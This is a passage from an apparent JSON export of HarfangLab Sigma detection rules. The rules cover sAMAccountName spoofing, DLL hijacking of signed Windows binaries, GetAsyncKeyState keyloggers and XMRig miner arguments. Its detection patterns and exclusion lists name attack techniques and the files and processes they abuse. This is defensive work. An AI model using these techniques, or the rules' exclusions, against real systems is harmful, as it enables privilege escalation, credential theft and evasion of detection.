"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611218Z",
"creation_date": "2026-03-23T11:45:34.611221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html",
"https://github.com/WazeHell/sam-the-admin",
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
"https://attack.mitre.org/techniques/T1098/",
"https://attack.mitre.org/techniques/T1078/002/"
],
"name": "t1078_002_sam_the_admin_tool_usage.yml",
"content": "title: SAM AccountName Spoofed via sam-the-admin\nid: 9308cd5d-6872-414a-93c3-1ed4c2a98ff9\ndescription: |\n Detects suspicious creation of a Machine Account with the SAMTHEADMIN name.\n This can be the result of sAMAccountName spoofing exploitation (CVE-2021-42287 and CVE-2021-42278) via sam-the-admin exploitation code.\n Exploitation of the CVE-2021-42278 vulnerability results in the ability to change a machine account sAMAccountName attribute to a domain controller's name without the trailing $.\n In combinaison with CVE-2021-42287, it allowed attackers to impersonate a domain controller account.\nreferences:\n - https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n - https://github.com/WazeHell/sam-the-admin\n - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/002/\ndate: 2022/10/03\nmodified: 2024/01/15\nauthor: HarfangLab\ntags:\n - attack.t1078.002\n - attack.t1098\n - attack.privilege_escalation\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.sAMAccountName\n - classification.Windows.Exploit.CVE-2021-42278\n - classification.Windows.Exploit.CVE-2021-42287\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4741\n filter_sam_name:\n SamAccountName|startswith: 'SAMTHEADMIN-'\n filter_user_name:\n TargetUserName|startswith: 'SAMTHEADMIN-'\n condition: selection and (filter_sam_name or filter_user_name)\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9308cd5d-6872-414a-93c3-1ed4c2a98ff9",
"rule_name": "SAM AccountName Spoofed via sam-the-admin",
"rule_description": "Detects suspicious creation of a Machine Account with the SAMTHEADMIN name.\nThis can be the result of sAMAccountName spoofing exploitation (CVE-2021-42287 and CVE-2021-42278) via sam-the-admin exploitation code.\nExploitation of the CVE-2021-42278 vulnerability results in the ability to change a machine account sAMAccountName attribute to a domain controller's name without the trailing $.\nIn combinaison with CVE-2021-42287, it allowed attackers to impersonate a domain controller account.\n",
"rule_creation_date": "2022-10-03",
"rule_modified_date": "2024-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9308fb68-80cf-4c43-b472-4fd3579d707c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094404Z",
"creation_date": "2026-03-23T11:45:34.094406Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094410Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lpksetup.yml",
"content": "title: DLL Hijacking via lpksetup.exe\nid: 9308fb68-80cf-4c43-b472-4fd3579d707c\ndescription: |\n Detects potential Windows DLL Hijacking via lpksetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lpksetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\dpx.dll'\n - '\\lpksetupproxyserv.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9308fb68-80cf-4c43-b472-4fd3579d707c",
"rule_name": "DLL Hijacking via lpksetup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via lpksetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "933b39f4-d353-4ace-b166-4b9d83517edb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590184Z",
"creation_date": "2026-03-23T11:45:34.590190Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590202Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_presentationsettings.yml",
"content": "title: DLL Hijacking via presentationsettings.exe\nid: 933b39f4-d353-4ace-b166-4b9d83517edb\ndescription: |\n Detects potential Windows DLL Hijacking via presentationsettings.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'presentationsettings.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mmdevapi.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\SspiCli.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "933b39f4-d353-4ace-b166-4b9d83517edb",
"rule_name": "DLL Hijacking via presentationsettings.exe",
"rule_description": "Detects potential Windows DLL Hijacking via presentationsettings.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "934952a1-0688-4084-87a4-21dfd45e1e51",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295949Z",
"creation_date": "2026-03-23T11:45:35.295952Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295958Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/",
"https://blog.sekoia.io/darkgate-internals/",
"https://www.uptycs.com/blog/threat-research-report-team/warzone-rat-comes-with-uac-bypass-technique",
"https://www.cybereason.com/blog/research/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
"https://attack.mitre.org/techniques/T1056/001/"
],
"name": "t1056_001_getasynckeystate_keylogger.yml",
"content": "title: Possible GetAsyncKeyState Keylogger\nid: 934952a1-0688-4084-87a4-21dfd45e1e51\ndescription: |\n Detects a suspicious call to the GetAsyncKeyState API.\n This API determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.\n Adversaries may use this API in order to log user keystrokes and intercept credentials as the user types them.\n It is recommended to check the process which called GetAsyncKeyState for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/\n - https://blog.sekoia.io/darkgate-internals/\n - https://www.uptycs.com/blog/threat-research-report-team/warzone-rat-comes-with-uac-bypass-technique\n - https://www.cybereason.com/blog/research/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite\n - https://attack.mitre.org/techniques/T1056/001/\ndate: 2025/04/29\nmodified: 2026/12/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1056.001\n - classification.Windows.Source.Win32kGetAsyncKeyState\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Keylogger\nlogsource:\n product: windows\n category: win32k_getasynckeystate\ndetection:\n selection:\n AgentVersion|gte|version: 4.9.0\n # Keyloggers frequently invoke GetAsyncKeyState to achieve high-precision keystroke capture\n BackgroundCallCount|gt: 1000000\n Image|startswith:\n - '?:\\Users\\'\n - '?:\\Windows\\'\n - '?:\\ProgramData\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_other_signed_program:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'NVIDIA Corporation'\n - 'SOC Informatique'\n - 'Cisco WebEx LLC'\n - 'Skyline Software Systems Inc'\n - 'Skyline Software Systems, Inc'\n - 'VNG CORPORATION'\n - 'YNYNG LLC'\n - 'Progress Software Corporation'\n - 'Dedalus Italia S.P.A.'\n - 'Oracle America, Inc.'\n - 'ANSYS Inc.'\n - 'A K I O SAS'\n - 'AKIO SAS'\n - 'Nenad Hrg'\n - 'Adobe Inc.'\n - 'Tixeo SAS'\n - 'Esm Software'\n - 'LogMeIn, Inc.'\n - 'Environmental Systems Research Institute, Inc.'\n - 'Klee Commerce SAS'\n - 'Biesse S.p.A'\n - 'CarrierX LLC'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_optimot:\n ProcessSha256: '9622289397f00c03f0cb78dbff1ae2f40aeb1f688ab754809e5caeb3f58a77ac'\n\n exclusion_gcti:\n ProcessCompany: 'Genesys Telecommunications Laboratories, Inc.'\n ProcessProcessName:\n - 'GenesysSoftphone.exe'\n - 'InteractionWorkspaceSIPEndpoint.exe'\n\n exclusion_avob:\n ProcessOriginalFileName: 'Photoshop.exe'\n ProcessCompany : 'adobe'\n\n exclusion_i_fourc:\n ProcessOriginalFileName: 'JIM.exe'\n ProcessCompany : 'I-FourC®'\n\n exclusion_arcplus:\n ProcessOriginalFileName: 'arcplus.exe'\n ProcessCompany : 'ARC Technology'\n\n exclusion_netgeo:\n ProcessOriginalFileName: 'GI.Netgeo.UI.exe'\n ProcessCompany : 'GiSmartware'\n\n exclusion_4d:\n ProcessOriginalFileName:\n - '4D.exe'\n - '4D_WS.exe'\n ProcessCompany : '4D'\n ProcessDescription: '4e Dimension'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "934952a1-0688-4084-87a4-21dfd45e1e51",
"rule_name": "Possible GetAsyncKeyState Keylogger",
"rule_description": "Detects a suspicious call to the GetAsyncKeyState API.\nThis API determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.\nAdversaries may use this API in order to log user keystrokes and intercept credentials as the user types them.\nIt is recommended to check the process which called GetAsyncKeyState for suspicious activities.\n",
"rule_creation_date": "2025-04-29",
"rule_modified_date": "2026-12-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1056.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "934d8149-fd57-4838-bcb1-80f8369b603d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611313Z",
"creation_date": "2026-03-23T11:45:34.611317Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611325Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing",
"https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html",
"https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/",
"https://attack.mitre.org/techniques/T1078/002/"
],
"name": "t1078_002_samaccountname_spoofing.yml",
"content": "title: SAM AccountName Spoofed\nid: 934d8149-fd57-4838-bcb1-80f8369b603d\ndescription: |\n Detects potential exploitation of CVE-2021-42278, an Active Directory Domain Services Elevation of Privilege Vulnerability.\n Exploitation of this vulnerability results in the ability to change a machine account SAMAccountName attribute to a domain controller's name without the trailing \"$\".\n In combinaison with CVE-2021-42287, it allows attackers to impersonate a domain controller account.\nreferences:\n - https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing\n - https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\n - https://attack.mitre.org/techniques/T1078/002/\ndate: 2021/12/13\nmodified: 2024/03/12\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2021-42278\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2021-42278\n - classification.Windows.Exploit.SAMAccountName\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4781\n OldTargetUserName|endswith: '$'\n\n filter_newtarget:\n NewTargetUserName|endswith: '$'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "934d8149-fd57-4838-bcb1-80f8369b603d",
"rule_name": "SAM AccountName Spoofed",
"rule_description": "Detects potential exploitation of CVE-2021-42278, an Active Directory Domain Services Elevation of Privilege Vulnerability.\nExploitation of this vulnerability results in the ability to change a machine account SAMAccountName attribute to a domain controller's name without the trailing \"$\".\nIn combinaison with CVE-2021-42287, it allows attackers to impersonate a domain controller account.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2024-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "93d39164-301b-4198-86a9-0707c82a3347",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609707Z",
"creation_date": "2026-03-23T11:45:34.609711Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://xmrig.com/docs/miner/command-line-options",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_xmrig_cryptominer_commandline_args_windows.yml",
"content": "title: Possible XMRig Execution (Windows)\nid: 93d39164-301b-4198-86a9-0707c82a3347\ndescription: |\n Detects suspicious arguments in a command-line potentially linked to XMRig cryptominer.\n XMRig is an open source cryptominer used by adversaries to mine cryptocurrency on victim systems.\n It is recommended to determine whether the execution of this tool is legitimate and to start remediative actions if necessary.\nreferences:\n - https://xmrig.com/docs/miner/command-line-options\n - https://attack.mitre.org/techniques/T1496/\ndate: 2022/11/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.CryptoMiner.XMRig\n - classification.Windows.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains:\n - ' --rig-id'\n - ' --argon2-impl'\n - ' --donate-level='\n - ' --max-cpu-usage='\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "93d39164-301b-4198-86a9-0707c82a3347",
"rule_name": "Possible XMRig Execution (Windows)",
"rule_description": "Detects suspicious arguments in a command-line potentially linked to XMRig cryptominer.\nXMRig is an open source cryptominer used by adversaries to mine cryptocurrency on victim systems.\nIt is recommended to determine whether the execution of this tool is legitimate and to start remediative actions if necessary.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "93f0ca06-4450-4e9b-a680-a037d640b553",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619123Z",
"creation_date": "2026-03-23T11:45:34.619125Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vaultcmd.yml",
"content": "title: DLL Hijacking via vaultcmd.exe\nid: 93f0ca06-4450-4e9b-a680-a037d640b553\ndescription: |\n Detects potential Windows DLL Hijacking via vaultcmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vaultcmd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\userenv.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "93f0ca06-4450-4e9b-a680-a037d640b553",
"rule_name": "DLL Hijacking via vaultcmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vaultcmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "94256ed3-174c-46be-b5df-97c9d5d3af5a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621483Z",
"creation_date": "2026-03-23T11:45:34.621485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621489Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/",
"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_crash_dump_disable_registry.yml",
